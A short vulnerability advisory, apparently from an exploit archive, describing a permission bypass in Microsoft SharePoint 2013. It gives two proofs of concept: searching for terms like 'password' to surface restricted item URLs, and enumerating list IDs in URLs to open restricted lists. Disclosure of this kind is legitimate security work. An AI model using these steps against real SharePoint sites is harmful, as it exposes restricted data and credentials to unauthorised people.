Microsoft SharePoint Limited Access Permission Bypass

Microsoft SharePoint suffers from a Limited Access permission bypass vulnerability.


MD5 | 0295554bf43ae5430a02da73edf4cfd7

vulnerability Title: Microsoft SharePoint 'Limited Access' Permission Bypass

This vulnerability was discovered by 'Behnam Vanda' January 07, 2018


======================
I. About Vulnerability
======================
A permission level bypass vulnerability has been identified in microsoft sharePoint 2013 & maybe prior. This vulnerability allows attackers to open or view restricted items in the site or library. An authenticated user can bypass 'Limited Acces' permission to browse a site page or library to access a specific content item that was restricted.

======================
II. Exploit
======================
#POC 1 :

1. Search for specific words inside web & mobile sharepoint search box: "password" "pass" "user" "domain\user" "name | lastname" & etc

[~] web search : http://site/BSearch/results.aspx
[~] mobie search : http://site/_layouts/mobile/MobileResults.aspx


example : http://site/BSearch/results.aspx?k=password
example : http://site/BSearch/results.aspx?k="NSA\1377"
example : http://site/_layouts/mobile/MobileResults.aspx?k=pass
example : http://site/_layouts/mobile/MobileResults.aspx?k=BOB


2. The page shown some of sharepoint's search results like restricted specific item,site,library urls

3. so click at the urls to access|viwe|read site page and other restricted library and items

--------------------------------------
#POC 2 :

after capturing packets between our system and sharepoint site (use fiddler or brupsiute , wireshark , etc) We have access to items,list,pages,sites urls like as the following :

http://site/IT/Lists/List70/AllItems.aspx

so access to restricted items & lists by make /LIST#/ urls.

for example :
http://site/IT/Lists/List100/AllItems.aspx
http://site/IT/Lists/List101/AllItems.aspx
http://site/IT/Lists/List102/AllItems.aspx

======================
III. Affected Systems

Microsoft SharePoint 2013 & maybe prior
======================

----------------------
Behnam Vanda
[redhathackers]

E-Mail: beni[dot]vanda[at]gmail.com



Related Posts

Comments